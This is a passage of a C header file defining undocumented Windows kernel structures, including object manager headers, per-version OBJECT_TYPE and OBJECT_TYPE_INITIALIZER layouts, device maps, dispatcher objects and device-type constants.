} OBJECT_HANDLE_COUNT_ENTRY, *POBJECT_HANDLE_COUNT_ENTRY;
typedef struct _OBJECT_HEADER_HANDLE_INFO { // Size=16
union {
PVOID HandleCountDataBase; // Size=8 Offset=0
struct _OBJECT_HANDLE_COUNT_ENTRY SingleEntry; // Size=16 Offset=0
};
} OBJECT_HEADER_HANDLE_INFO, *POBJECT_HEADER_HANDLE_INFO;
typedef struct _OBJECT_HEADER_PROCESS_INFO { // Size=16
PVOID ExclusiveProcess; // Size=8 Offset=0
PVOID Reserved; // Size=8 Offset=8
} OBJECT_HEADER_PROCESS_INFO, *POBJECT_HEADER_PROCESS_INFO;
typedef struct _OBJECT_HEADER_QUOTA_INFO {
ULONG PagedPoolCharge; //4
ULONG NonPagedPoolCharge; //4
ULONG SecurityDescriptorCharge; //4
PVOID SecurityDescriptorQuotaBlock; //sizeof(pointer)
unsigned __int64 Reserved; //sizeof(uint64)
} OBJECT_HEADER_QUOTA_INFO, *POBJECT_HEADER_QUOTA_INFO;
typedef struct _OBJECT_HEADER_PADDING_INFO {
ULONG PaddingAmount;
} OBJECT_HEADER_PADDING_INFO, *POBJECT_HEADER_PADDING_INFO;
typedef struct _OBJECT_HEADER_AUDIT_INFO {
PVOID SecurityDescriptor;
PVOID Reserved;
} OBJECT_HEADER_AUDIT_INFO, *POBJECT_HEADER_AUDIT_INFO;
typedef struct _OBJECT_HEADER_EXTENDED_INFO {
struct _OBJECT_FOOTER *Footer;
PVOID Reserved;
} OBJECT_HEADER_EXTENDED_INFO, POBJECT_HEADER_EXTENDED_INFO;
typedef struct _OB_HANDLE_REVOCATION_BLOCK
{
LIST_ENTRY RevocationInfos;
struct _EX_PUSH_LOCK Lock;
struct _EX_RUNDOWN_REF Rundown;
} OB_HANDLE_REVOCATION_BLOCK, *POB_HANDLE_REVOCATION_BLOCK;
typedef struct _OBJECT_HEADER_HANDLE_REVOCATION_INFO {
LIST_ENTRY ListEntry;
OB_HANDLE_REVOCATION_BLOCK* RevocationBlock;
unsigned char Padding1[4];
unsigned char Padding2[4];
} OBJECT_HEADER_HANDLE_REVOCATION_INFO, *POBJECT_HEADER_HANDLE_REVOCATION_INFO;
typedef struct _QUAD {
union {
INT64 UseThisFieldToCopy;
float DoNotUseThisField;
};
} QUAD, *PQUAD;
typedef struct _OBJECT_CREATE_INFORMATION {
ULONG Attributes;
PVOID RootDirectory;
CHAR ProbeMode;
ULONG PagedPoolCharge;
ULONG NonPagedPoolCharge;
ULONG SecurityDescriptorCharge;
PVOID SecurityDescriptor;
PSECURITY_QUALITY_OF_SERVICE SecurityQos;
SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
} OBJECT_CREATE_INFORMATION, *POBJECT_CREATE_INFORMATION;
typedef struct _SECURITY_CLIENT_CONTEXT {
struct _SECURITY_QUALITY_OF_SERVICE SecurityQos;
void* ClientToken;
UCHAR DirectlyAccessClientToken;
UCHAR DirectAccessEffectiveOnly;
UCHAR ServerIsRemote;
struct _TOKEN_CONTROL ClientTokenControl;
LONG __PADDING__[1];
} SECURITY_CLIENT_CONTEXT, *PSECURITY_CLIENT_CONTEXT;
typedef enum _POOL_TYPE {
NonPagedPool,
NonPagedPoolExecute = NonPagedPool,
PagedPool,
NonPagedPoolMustSucceed = NonPagedPool + 2,
DontUseThisType,
NonPagedPoolCacheAligned = NonPagedPool + 4,
PagedPoolCacheAligned,
NonPagedPoolCacheAlignedMustS = NonPagedPool + 6,
MaxPoolType,
NonPagedPoolBase = 0,
NonPagedPoolBaseMustSucceed = NonPagedPoolBase + 2,
NonPagedPoolBaseCacheAligned = NonPagedPoolBase + 4,
NonPagedPoolBaseCacheAlignedMustS = NonPagedPoolBase + 6,
NonPagedPoolSession = 32,
PagedPoolSession = NonPagedPoolSession + 1,
NonPagedPoolMustSucceedSession = PagedPoolSession + 1,
DontUseThisTypeSession = NonPagedPoolMustSucceedSession + 1,
NonPagedPoolCacheAlignedSession = DontUseThisTypeSession + 1,
PagedPoolCacheAlignedSession = NonPagedPoolCacheAlignedSession + 1,
NonPagedPoolCacheAlignedMustSSession = PagedPoolCacheAlignedSession + 1,
NonPagedPoolNx = 512,
NonPagedPoolNxCacheAligned = NonPagedPoolNx + 4,
NonPagedPoolSessionNx = NonPagedPoolNx + 32
} POOL_TYPE;
//
// WARNING this structure is incomplete, refer to complete definitions below if you need actual full variant.
//
typedef struct _OBJECT_TYPE_INITIALIZER_COMPATIBLE {// Size=120
USHORT Length; // Size=2 Offset=0
UCHAR ObjectTypeFlags; // Size=1 Offset=2
ULONG ObjectTypeCode; // Size=4 Offset=4
ULONG InvalidAttributes; // Size=4 Offset=8
GENERIC_MAPPING GenericMapping; // Size=16 Offset=12
ULONG ValidAccessMask; // Size=4 Offset=28
ULONG RetainAccess; // Size=4 Offset=32
POOL_TYPE PoolType; // Size=4 Offset=36
ULONG DefaultPagedPoolCharge; // Size=4 Offset=40
ULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44
PVOID DumpProcedure; // Size=8 Offset=48
PVOID OpenProcedure; // Size=8 Offset=56
PVOID CloseProcedure; // Size=8 Offset=64
PVOID DeleteProcedure; // Size=8 Offset=72
PVOID ParseProcedure; // Size=8 Offset=80
PVOID SecurityProcedure; // Size=8 Offset=88
PVOID QueryNameProcedure; // Size=8 Offset=96
PVOID OkayToCloseProcedure; // Size=8 Offset=104
} OBJECT_TYPE_INITIALIZER_COMPATIBLE, *POBJECT_TYPE_INITIALIZER_COMPATIBLE;
//
// WARNING this structure is incomplete, refer to complete definitions below if you need actual full variant.
//
typedef struct _OBJECT_TYPE_COMPATIBLE {
LIST_ENTRY TypeList;
UNICODE_STRING Name;
PVOID DefaultObject;
UCHAR Index;
ULONG TotalNumberOfObjects;
ULONG TotalNumberOfHandles;
ULONG HighWaterNumberOfObjects;
ULONG HighWaterNumberOfHandles;
OBJECT_TYPE_INITIALIZER_COMPATIBLE TypeInfo;
} OBJECT_TYPE_COMPATIBLE, *POBJECT_TYPE_COMPATIBLE;
typedef POBJECT_TYPE_COMPATIBLE POBJECT_TYPE;
//
// Complete definitions of OBJECT_TYPE + OBJECT_TYPE_INITIALIZER per Windows version.
//
typedef struct _OBJECT_TYPE_INITIALIZER_7 {
USHORT Length;
union
{
UCHAR ObjectTypeFlags;
struct
{
UCHAR CaseInsensitive : 1;
UCHAR UnnamedObjectsOnly : 1;
UCHAR UseDefaultObject : 1;
UCHAR SecurityRequired : 1;
UCHAR MaintainHandleCount : 1;
UCHAR MaintainTypeList : 1;
UCHAR SupportsObjectCallbacks : 1;
};
};
ULONG ObjectTypeCode;
ULONG InvalidAttributes;
GENERIC_MAPPING GenericMapping;
ULONG ValidAccessMask;
ULONG RetainAccess;
POOL_TYPE PoolType;
ULONG DefaultPagedPoolCharge;
ULONG DefaultNonPagedPoolCharge;
PVOID DumpProcedure;
PVOID OpenProcedure;
PVOID CloseProcedure;
PVOID DeleteProcedure;
PVOID ParseProcedure;
PVOID SecurityProcedure;
PVOID QueryNameProcedure;
PVOID OkayToCloseProcedure;
} OBJECT_TYPE_INITIALIZER_7, *POBJECT_TYPE_INITIALIZER_7;
//
// Windows 8, new object type flag, WaitObject* members added
//
typedef struct _OBJECT_TYPE_INITIALIZER_8 {
USHORT Length;
union
{
UCHAR ObjectTypeFlags;
struct
{
UCHAR CaseInsensitive : 1;
UCHAR UnnamedObjectsOnly : 1;
UCHAR UseDefaultObject : 1;
UCHAR SecurityRequired : 1;
UCHAR MaintainHandleCount : 1;
UCHAR MaintainTypeList : 1;
UCHAR SupportsObjectCallbacks : 1;
UCHAR CacheAligned : 1;
};
};
ULONG ObjectTypeCode;
ULONG InvalidAttributes;
GENERIC_MAPPING GenericMapping;
ULONG ValidAccessMask;
ULONG RetainAccess;
POOL_TYPE PoolType;
ULONG DefaultPagedPoolCharge;
ULONG DefaultNonPagedPoolCharge;
PVOID DumpProcedure;
PVOID OpenProcedure;
PVOID CloseProcedure;
PVOID DeleteProcedure;
PVOID ParseProcedure;
PVOID SecurityProcedure;
PVOID QueryNameProcedure;
PVOID OkayToCloseProcedure;
ULONG WaitObjectFlagMask;
USHORT WaitObjectFlagOffset;
USHORT WaitObjectPointerOffset;
} OBJECT_TYPE_INITIALIZER_8, *POBJECT_TYPE_INITIALIZER_8;
//
// Windows 10 RS1, new ObjectTypeFlags2 flag added,
// ParseProcedure now has two variants with different parameters.
//
typedef struct _OBJECT_TYPE_INITIALIZER_RS1 {
USHORT Length;
union
{
UCHAR ObjectTypeFlags;
struct
{
UCHAR CaseInsensitive : 1;
UCHAR UnnamedObjectsOnly : 1;
UCHAR UseDefaultObject : 1;
UCHAR SecurityRequired : 1;
UCHAR MaintainHandleCount : 1;
UCHAR MaintainTypeList : 1;
UCHAR SupportsObjectCallbacks : 1;
UCHAR CacheAligned : 1;
};
};
union
{
UCHAR ObjectTypeFlags2; //for ParseProcedureEx
struct
{
UCHAR UseExtendedParameters : 1;
UCHAR Reserved : 7;
};
};
ULONG ObjectTypeCode;
ULONG InvalidAttributes;
GENERIC_MAPPING GenericMapping;
ULONG ValidAccessMask;
ULONG RetainAccess;
POOL_TYPE PoolType;
ULONG DefaultPagedPoolCharge;
ULONG DefaultNonPagedPoolCharge;
PVOID DumpProcedure;
PVOID OpenProcedure;
PVOID CloseProcedure;
PVOID DeleteProcedure;
union {
PVOID ParseProcedure;
PVOID ParseProcedureEx;
};
PVOID SecurityProcedure;
PVOID QueryNameProcedure;
PVOID OkayToCloseProcedure;
ULONG WaitObjectFlagMask;
USHORT WaitObjectFlagOffset;
USHORT WaitObjectPointerOffset;
} OBJECT_TYPE_INITIALIZER_RS1, *POBJECT_TYPE_INITIALIZER_RS1;
//
// ObjectTypeFlags2 moved to extended to USHORT ObjectTypeFlags field.
// It was that hard to do this since beginning?
//
typedef struct _OBJECT_TYPE_INITIALIZER_RS2 {
USHORT Length;
union
{
USHORT ObjectTypeFlags;
struct
{
UCHAR CaseInsensitive : 1;
UCHAR UnnamedObjectsOnly : 1;
UCHAR UseDefaultObject : 1;
UCHAR SecurityRequired : 1;
UCHAR MaintainHandleCount : 1;
UCHAR MaintainTypeList : 1;
UCHAR SupportsObjectCallbacks : 1;
UCHAR CacheAligned : 1;
};
struct
{
UCHAR UseExtendedParameters : 1;//for ParseProcedureEx
UCHAR Reserved : 7;
};
};
ULONG ObjectTypeCode;
ULONG InvalidAttributes;
GENERIC_MAPPING GenericMapping;
ULONG ValidAccessMask;
ULONG RetainAccess;
POOL_TYPE PoolType;
ULONG DefaultPagedPoolCharge;
ULONG DefaultNonPagedPoolCharge;
PVOID DumpProcedure;
PVOID OpenProcedure;
PVOID CloseProcedure;
PVOID DeleteProcedure;
union {
PVOID ParseProcedure;
PVOID ParseProcedureEx;
};
PVOID SecurityProcedure;
PVOID QueryNameProcedure;
PVOID OkayToCloseProcedure;
ULONG WaitObjectFlagMask;
USHORT WaitObjectFlagOffset;
USHORT WaitObjectPointerOffset;
} OBJECT_TYPE_INITIALIZER_RS2, *POBJECT_TYPE_INITIALIZER_RS2;
//
// OBJECT_TYPE definition vary only because of OBJECT_TYPE_INITIALIZER changes.
//
typedef struct _OBJECT_TYPE_7 {
LIST_ENTRY TypeList;
UNICODE_STRING Name;
PVOID DefaultObject;
UCHAR Index;
ULONG TotalNumberOfObjects;
ULONG TotalNumberOfHandles;
ULONG HighWaterNumberOfObjects;
ULONG HighWaterNumberOfHandles;
OBJECT_TYPE_INITIALIZER_7 TypeInfo;
EX_PUSH_LOCK TypeLock;
ULONG Key;
LIST_ENTRY CallbackList;
} OBJECT_TYPE_7, POBJECT_TYPE_7;
typedef struct _OBJECT_TYPE_8 {
LIST_ENTRY TypeList;
UNICODE_STRING Name;
PVOID DefaultObject;
UCHAR Index;
ULONG TotalNumberOfObjects;
ULONG TotalNumberOfHandles;
ULONG HighWaterNumberOfObjects;
ULONG HighWaterNumberOfHandles;
OBJECT_TYPE_INITIALIZER_8 TypeInfo;
EX_PUSH_LOCK TypeLock;
ULONG Key;
LIST_ENTRY CallbackList;
} OBJECT_TYPE_8, POBJECT_TYPE_8;
typedef struct _OBJECT_TYPE_RS1 {
LIST_ENTRY TypeList;
UNICODE_STRING Name;
PVOID DefaultObject;
UCHAR Index;
ULONG TotalNumberOfObjects;
ULONG TotalNumberOfHandles;
ULONG HighWaterNumberOfObjects;
ULONG HighWaterNumberOfHandles;
OBJECT_TYPE_INITIALIZER_RS1 TypeInfo;
EX_PUSH_LOCK TypeLock;
ULONG Key;
LIST_ENTRY CallbackList;
} OBJECT_TYPE_RS1, POBJECT_TYPE_RS1;
typedef struct _OBJECT_TYPE_RS2 {
LIST_ENTRY TypeList;
UNICODE_STRING Name;
PVOID DefaultObject;
UCHAR Index;
ULONG TotalNumberOfObjects;
ULONG TotalNumberOfHandles;
ULONG HighWaterNumberOfObjects;
ULONG HighWaterNumberOfHandles;
OBJECT_TYPE_INITIALIZER_RS2 TypeInfo;
EX_PUSH_LOCK TypeLock;
ULONG Key;
LIST_ENTRY CallbackList;
} OBJECT_TYPE_RS2, POBJECT_TYPE_RS2;
/*
** brand new header starting from 6.1
*/
typedef struct _OBJECT_HEADER {
LONG_PTR PointerCount;
union
{
LONG_PTR HandleCount;
PVOID NextToFree;
};
EX_PUSH_LOCK Lock;
UCHAR TypeIndex;
UCHAR TraceFlags;
UCHAR InfoMask;
UCHAR Flags;
union
{
POBJECT_CREATE_INFORMATION ObjectCreateInfo;
PVOID QuotaBlockCharged;
};
PVOID SecurityDescriptor;
QUAD Body;
} OBJECT_HEADER, *POBJECT_HEADER;
//
// Actual object header from windows 10-11.
//
typedef struct _OBJECT_HEADER_X {
LONG_PTR PointerCount;
union
{
LONG_PTR HandleCount;
PVOID NextToFree;
};
EX_PUSH_LOCK Lock;
UCHAR TypeIndex;
union
{
UCHAR TraceFlags;
struct
{
UCHAR DbgRefTrace : 1;
UCHAR DbgTracePermanent : 1;
};
};
UCHAR InfoMask;
union
{
UCHAR Flags;
struct
{
UCHAR NewObject : 1;
UCHAR KernelObject : 1;
UCHAR KernelOnlyAccess : 1;
UCHAR ExclusiveObject : 1;
UCHAR PermanentObject : 1;
UCHAR DefaultSecurityQuota : 1;
UCHAR SingleHandleEntry : 1;
UCHAR DeletedInline : 1;
};
};
ULONG Reserved;
union
{
POBJECT_CREATE_INFORMATION ObjectCreateInfo;
PVOID QuotaBlockCharged;
};
PVOID SecurityDescriptor;
QUAD Body;
} OBJECT_HEADER_X, * POBJECT_HEADER_X;
#define OBJECT_TO_OBJECT_HEADER(obj) \
CONTAINING_RECORD( (obj), OBJECT_HEADER, Body )
#define DOSDEVICE_DRIVE_UNKNOWN 0
#define DOSDEVICE_DRIVE_CALCULATE 1 //e.g. symlink
#define DOSDEVICE_DRIVE_REMOVABLE 2
#define DOSDEVICE_DRIVE_FIXED 3
#define DOSDEVICE_DRIVE_REMOTE 4
#define DOSDEVICE_DRIVE_CDROM 5
#define DOSDEVICE_DRIVE_RAMDISK 6
typedef struct _DEVICE_MAP_V1 {
OBJECT_DIRECTORY* DosDevicesDirectory;
OBJECT_DIRECTORY* GlobalDosDevicesDirectory;
PVOID DosDevicesDirectoryHandle;
ULONG ReferenceCount;
ULONG DriveMap;
UCHAR DriveType[32];
} DEVICE_MAP_V1, * PDEVICE_MAP_V1;
typedef struct _DEVICE_MAP_V1 DEVICE_MAP_COMPATIBLE;
typedef struct _DEVICE_MAP_V1* PDEVICE_MAP_COMPATIBLE;
//Since REDSTONE1 (14393)
typedef struct _DEVICE_MAP_V2 {
OBJECT_DIRECTORY* DosDevicesDirectory;
OBJECT_DIRECTORY* GlobalDosDevicesDirectory;
PVOID DosDevicesDirectoryHandle;
volatile LONG ReferenceCount;
ULONG DriveMap;
UCHAR DriveType[32];
PEJOB ServerSilo;
} DEVICE_MAP_V2, * PDEVICE_MAP_V2;
//Since W11 (22000)
typedef struct _DEVICE_MAP_V3 {
OBJECT_DIRECTORY* DosDevicesDirectory;
OBJECT_DIRECTORY* GlobalDosDevicesDirectory;
PEJOB ServerSilo;
struct _DEVICE_MAP* GlobalDeviceMap;
EX_FAST_REF DriveObject[26];
LONGLONG ReferenceCount;
PVOID DosDevicesDirectoryHandle;
ULONG DriveMap;
UCHAR DriveType[32];
} DEVICE_MAP_V3, PDEVICE_MAP_V3;
/*
** OBJECT MANAGER END
*/
/*
* WDM START
*/
#define TIMER_TOLERABLE_DELAY_BITS 6
#define TIMER_EXPIRED_INDEX_BITS 6
#define TIMER_PROCESSOR_INDEX_BITS 5
typedef struct _DISPATCHER_HEADER {
union {
union {
volatile LONG Lock;
LONG LockNV;
} DUMMYUNIONNAME;
struct { // Events, Semaphores, Gates, etc.
UCHAR Type; // All (accessible via KOBJECT_TYPE)
UCHAR Signalling;
UCHAR Size;
UCHAR Reserved1;
} DUMMYSTRUCTNAME;
struct { // Timer
UCHAR TimerType;
union {
UCHAR TimerControlFlags;
struct {
UCHAR Absolute : 1;
UCHAR Wake : 1;
UCHAR EncodedTolerableDelay : TIMER_TOLERABLE_DELAY_BITS;
} DUMMYSTRUCTNAME;
};
UCHAR Hand;
union {
UCHAR TimerMiscFlags;
struct {
#if !defined(KENCODED_TIMER_PROCESSOR)
UCHAR Index : TIMER_EXPIRED_INDEX_BITS;
#else
UCHAR Index : 1;
UCHAR Processor : TIMER_PROCESSOR_INDEX_BITS;
#endif
UCHAR Inserted : 1;
volatile UCHAR Expired : 1;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
} DUMMYSTRUCTNAME2;
struct { // Timer2
UCHAR Timer2Type;
union {
UCHAR Timer2Flags;
struct {
UCHAR Timer2Inserted : 1;
UCHAR Timer2Expiring : 1;
UCHAR Timer2CancelPending : 1;
UCHAR Timer2SetPending : 1;
UCHAR Timer2Running : 1;
UCHAR Timer2Disabled : 1;
UCHAR Timer2ReservedFlags : 2;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
UCHAR Timer2Reserved1;
UCHAR Timer2Reserved2;
} DUMMYSTRUCTNAME3;
struct { // Queue
UCHAR QueueType;
union {
UCHAR QueueControlFlags;
struct {
UCHAR Abandoned : 1;
UCHAR DisableIncrement : 1;
UCHAR QueueReservedControlFlags : 6;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
UCHAR QueueSize;
UCHAR QueueReserved;
} DUMMYSTRUCTNAME4;
struct { // Thread
UCHAR ThreadType;
UCHAR ThreadReserved;
union {
UCHAR ThreadControlFlags;
struct {
UCHAR CycleProfiling : 1;
UCHAR CounterProfiling : 1;
UCHAR GroupScheduling : 1;
UCHAR AffinitySet : 1;
UCHAR ThreadReservedControlFlags : 4;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
union {
UCHAR DebugActive;
#if !defined(_X86_)
struct {
BOOLEAN ActiveDR7 : 1;
BOOLEAN Instrumented : 1;
BOOLEAN Minimal : 1;
BOOLEAN Reserved4 : 3;
BOOLEAN UmsScheduled : 1;
BOOLEAN UmsPrimary : 1;
} DUMMYSTRUCTNAME;
#endif
} DUMMYUNIONNAME2;
} DUMMYSTRUCTNAME5;
struct { // Mutant
UCHAR MutantType;
UCHAR MutantSize;
BOOLEAN DpcActive;
UCHAR MutantReserved;
} DUMMYSTRUCTNAME6;
} DUMMYUNIONNAME;
LONG SignalState; // Object lock
LIST_ENTRY WaitListHead; // Object lock
} DISPATCHER_HEADER, *PDISPATCHER_HEADER;
typedef struct _KEVENT {
DISPATCHER_HEADER Header;
} KEVENT, *PKEVENT, *PRKEVENT;
typedef struct _FAST_MUTEX {
LONG_PTR Count;
void *Owner;
ULONG Contention;
struct _KEVENT Event;
ULONG OldIrql;
LONG __PADDING__[1];
} FAST_MUTEX, *PFAST_MUTEX;
typedef struct _KMUTANT {
DISPATCHER_HEADER Header;
LIST_ENTRY MutantListEntry;
struct _KTHREAD *OwnerThread;
BOOLEAN Abandoned;
UCHAR ApcDisable;
} KMUTANT, *PKMUTANT, *PRKMUTANT, KMUTEX, *PKMUTEX, *PRKMUTEX;
typedef struct _KSEMAPHORE {
DISPATCHER_HEADER Header;
LONG Limit;
} KSEMAPHORE, *PKSEMAPHORE, *PRKSEMAPHORE;
typedef struct _KTIMER {
DISPATCHER_HEADER Header;
ULARGE_INTEGER DueTime;
LIST_ENTRY TimerListEntry;
struct _KDPC *Dpc;
ULONG Processor;
LONG Period;
} KTIMER, *PKTIMER, *PRKTIMER;
typedef struct _KDEVICE_QUEUE_ENTRY {
LIST_ENTRY DeviceListEntry;
ULONG SortKey;
BOOLEAN Inserted;
} KDEVICE_QUEUE_ENTRY, *PKDEVICE_QUEUE_ENTRY, *PRKDEVICE_QUEUE_ENTRY;
typedef enum _KDPC_IMPORTANCE {
LowImportance,
MediumImportance,
HighImportance
} KDPC_IMPORTANCE;
typedef struct _KDPC {
union {
ULONG TargetInfoAsUlong;
struct {
UCHAR Type;
UCHAR Importance;
volatile USHORT Number;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
SINGLE_LIST_ENTRY DpcListEntry;
KAFFINITY ProcessorHistory;
PVOID DeferredRoutine;
PVOID DeferredContext;
PVOID SystemArgument1;
PVOID SystemArgument2;
__volatile PVOID DpcData;
} KDPC, *PKDPC, *PRKDPC;
typedef struct _WAIT_CONTEXT_BLOCK {
union {
KDEVICE_QUEUE_ENTRY WaitQueueEntry;
struct {
LIST_ENTRY DmaWaitEntry;
ULONG NumberOfChannels;
ULONG SyncCallback : 1;
ULONG DmaContext : 1;
ULONG Reserved : 30;
};
};
PVOID DeviceRoutine;
PVOID DeviceContext;
ULONG NumberOfMapRegisters;
PVOID DeviceObject;
PVOID CurrentIrp;
PKDPC BufferChainingDpc;
} WAIT_CONTEXT_BLOCK, *PWAIT_CONTEXT_BLOCK;
#define MAXIMUM_VOLUME_LABEL_LENGTH (32 * sizeof(WCHAR)) // 32 characters
typedef struct _VPB {
CSHORT Type;
CSHORT Size;
USHORT Flags;
USHORT VolumeLabelLength; // in bytes
struct _DEVICE_OBJECT *DeviceObject;
struct _DEVICE_OBJECT *RealDevice;
ULONG SerialNumber;
ULONG ReferenceCount;
WCHAR VolumeLabel[MAXIMUM_VOLUME_LABEL_LENGTH / sizeof(WCHAR)];
} VPB, *PVPB;
typedef struct _KQUEUE {
DISPATCHER_HEADER Header;
LIST_ENTRY EntryListHead;
ULONG CurrentCount;
ULONG MaximumCount;
LIST_ENTRY ThreadListHead;
} KQUEUE, *PKQUEUE;
typedef struct _KDEVICE_QUEUE {
CSHORT Type;
CSHORT Size;
LIST_ENTRY DeviceListHead;
KSPIN_LOCK Lock;
#if defined(_AMD64_)
union {
BOOLEAN Busy;
struct {
LONG64 Reserved : 8;
LONG64 Hint : 56;
};
};
#else
BOOLEAN Busy;
#endif
} KDEVICE_QUEUE, *PKDEVICE_QUEUE, *PRKDEVICE_QUEUE;
enum _KOBJECTS {
EventNotificationObject = 0x0,
EventSynchronizationObject = 0x1,
MutantObject = 0x2,
ProcessObject = 0x3,
QueueObject = 0x4,
SemaphoreObject = 0x5,
ThreadObject = 0x6,
GateObject = 0x7,
TimerNotificationObject = 0x8,
TimerSynchronizationObject = 0x9,
Spare2Object = 0xa,
Spare3Object = 0xb,
Spare4Object = 0xc,
Spare5Object = 0xd,
Spare6Object = 0xe,
Spare7Object = 0xf,
Spare8Object = 0x10,
Spare9Object = 0x11,
ApcObject = 0x12,
DpcObject = 0x13,
DeviceQueueObject = 0x14,
EventPairObject = 0x15,
InterruptObject = 0x16,
ProfileObject = 0x17,
ThreadedDpcObject = 0x18,
MaximumKernelObject = 0x19,
};
#define DO_VERIFY_VOLUME 0x00000002 // ntddk nthal ntifs wdm
#define DO_BUFFERED_IO 0x00000004 // ntddk nthal ntifs wdm
#define DO_EXCLUSIVE 0x00000008 // ntddk nthal ntifs wdm
#define DO_DIRECT_IO 0x00000010 // ntddk nthal ntifs wdm
#define DO_MAP_IO_BUFFER 0x00000020 // ntddk nthal ntifs wdm
#define DO_DEVICE_HAS_NAME 0x00000040 // ntddk nthal ntifs
#define DO_DEVICE_INITIALIZING 0x00000080 // ntddk nthal ntifs wdm
#define DO_SYSTEM_BOOT_PARTITION 0x00000100 // ntddk nthal ntifs
#define DO_LONG_TERM_REQUESTS 0x00000200 // ntddk nthal ntifs
#define DO_NEVER_LAST_DEVICE 0x00000400 // ntddk nthal ntifs
#define DO_SHUTDOWN_REGISTERED 0x00000800 // ntddk nthal ntifs wdm
#define DO_BUS_ENUMERATED_DEVICE 0x00001000 // ntddk nthal ntifs wdm
#define DO_POWER_PAGABLE 0x00002000 // ntddk nthal ntifs wdm
#define DO_POWER_INRUSH 0x00004000 // ntddk nthal ntifs wdm
#define DO_POWER_NOOP 0x00008000
#define DO_LOW_PRIORITY_FILESYSTEM 0x00010000 // ntddk nthal ntifs
#define DO_XIP 0x00020000
#define DO_DEVICE_TO_BE_RESET 0x04000000
#define DO_DAX_VOLUME 0x10000000
#define FILE_REMOVABLE_MEDIA 0x00000001
#define FILE_READ_ONLY_DEVICE 0x00000002
#define FILE_FLOPPY_DISKETTE 0x00000004
#define FILE_WRITE_ONCE_MEDIA 0x00000008
#define FILE_REMOTE_DEVICE 0x00000010
#define FILE_DEVICE_IS_MOUNTED 0x00000020
#define FILE_VIRTUAL_VOLUME 0x00000040
#define FILE_AUTOGENERATED_DEVICE_NAME 0x00000080
#define FILE_DEVICE_SECURE_OPEN 0x00000100
#define FILE_CHARACTERISTIC_PNP_DEVICE 0x00000800
#define FILE_CHARACTERISTIC_TS_DEVICE 0x00001000
#define FILE_CHARACTERISTIC_WEBDAV_DEVICE 0x00002000
#define FILE_CHARACTERISTIC_CSV 0x00010000
#define FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL 0x00020000
#define FILE_PORTABLE_DEVICE 0x00040000
#define FILE_DEVICE_BEEP 0x00000001
#define FILE_DEVICE_CD_ROM 0x00000002
#define FILE_DEVICE_CD_ROM_FILE_SYSTEM 0x00000003
#define FILE_DEVICE_CONTROLLER 0x00000004
#define FILE_DEVICE_DATALINK 0x00000005
#define FILE_DEVICE_DFS 0x00000006
#define FILE_DEVICE_DISK 0x00000007
#define FILE_DEVICE_DISK_FILE_SYSTEM 0x00000008
#define FILE_DEVICE_FILE_SYSTEM 0x00000009
#define FILE_DEVICE_INPORT_PORT 0x0000000a
#define FILE_DEVICE_KEYBOARD 0x0000000b
#define FILE_DEVICE_MAILSLOT 0x0000000c
#define FILE_DEVICE_MIDI_IN 0x0000000d
#define FILE_DEVICE_MIDI_OUT 0x0000000e
#define FILE_DEVICE_MOUSE 0x0000000f
#define FILE_DEVICE_MULTI_UNC_PROVIDER 0x00000010
#define FILE_DEVICE_NAMED_PIPE 0x00000011
#define FILE_DEVICE_NETWORK 0x00000012
#define FILE_DEVICE_NETWORK_BROWSER 0x00000013
#define FILE_DEVICE_NETWORK_FILE_SYSTEM 0x00000014
#define FILE_DEVICE_NULL 0x00000015
#define FILE_DEVICE_PARALLEL_PORT 0x00000016
#define FILE_DEVICE_PHYSICAL_NETCARD 0x00000017
#define FILE_DEVICE_PRINTER 0x00000018
#define FILE_DEVICE_SCANNER 0x00000019
#define FILE_DEVICE_SERIAL_MOUSE_PORT 0x0000001a
#define FILE_DEVICE_SERIAL_PORT 0x0000001b
#define FILE_DEVICE_SCREEN 0x0000001c
#define FILE_DEVICE_SOUND 0x0000001d
#define FILE_DEVICE_STREAMS 0x0000001e
#define FILE_DEVICE_TAPE 0x0000001f
#define FILE_DEVICE_TAPE_FILE_SYSTEM 0x00000020
#define FILE_DEVICE_TRANSPORT 0x00000021
#define FILE_DEVICE_UNKNOWN 0x00000022
#define FILE_DEVICE_VIDEO 0x00000023
#define FILE_DEVICE_VIRTUAL_DISK 0x00000024
#define FILE_DEVICE_WAVE_IN 0x00000025
#define FILE_DEVICE_WAVE_OUT 0x00000026
#define FILE_DEVICE_8042_PORT 0x00000027
#define FILE_DEVICE_NETWORK_REDIRECTOR 0x00000028
#define FILE_DEVICE_BATTERY 0x00000029
#define FILE_DEVICE_BUS_EXTENDER 0x0000002a
#define FILE_DEVICE_MODEM 0x0000002b
#define FILE_DEVICE_VDM 0x0000002c
#define FILE_DEVICE_MASS_STORAGE 0x0000002d
#define FILE_DEVICE_SMB 0x0000002e
#define FILE_DEVICE_KS 0x0000002f
#define FILE_DEVICE_CHANGER 0x00000030
#define FILE_DEVICE_SMARTCARD 0x00000031
#define FILE_DEVICE_ACPI 0x00000032
#define FILE_DEVICE_DVD 0x00000033
#define FILE_DEVICE_FULLSCREEN_VIDEO 0x00000034
#define FILE_DEVICE_DFS_FILE_SYSTEM 0x00000035
#define FILE_DEVICE_DFS_VOLUME 0x00000036
#define FILE_DEVICE_SERENUM 0x00000037
#define FILE_DEVICE_TERMSRV 0x00000038
#define FILE_DEVICE_KSEC 0x00000039
#define FILE_DEVICE_FIPS 0x0000003A
#define FILE_DEVICE_INFINIBAND 0x0000003B
#define FILE_DEVICE_VMBUS 0x0000003E
#define FILE_DEVICE_CRYPT_PROVIDER 0x0000003F
#define FILE_DEVICE_WPD 0x00000040
#define FILE_DEVICE_BLUETOOTH 0x00000041
#define FILE_DEVICE_MT_COMPOSITE 0x00000042
#define FILE_DEVICE_MT_TRANSPORT 0x00000043
#define FILE_DEVICE_BIOMETRIC 0x00000044
#define FILE_DEVICE_PMI 0x00000045
#define FILE_DEVICE_EHSTOR 0x00000046
#define FILE_DEVICE_DEVAPI 0x00000047
#define FILE_DEVICE_GPIO 0x00000048
#define FILE_DEVICE_USBEX 0x00000049
#define FILE_DEVICE_CONSOLE 0x00000050
#define FILE_DEVICE_NFP 0x00000051
#define FILE_DEVICE_SYSENV 0x00000052
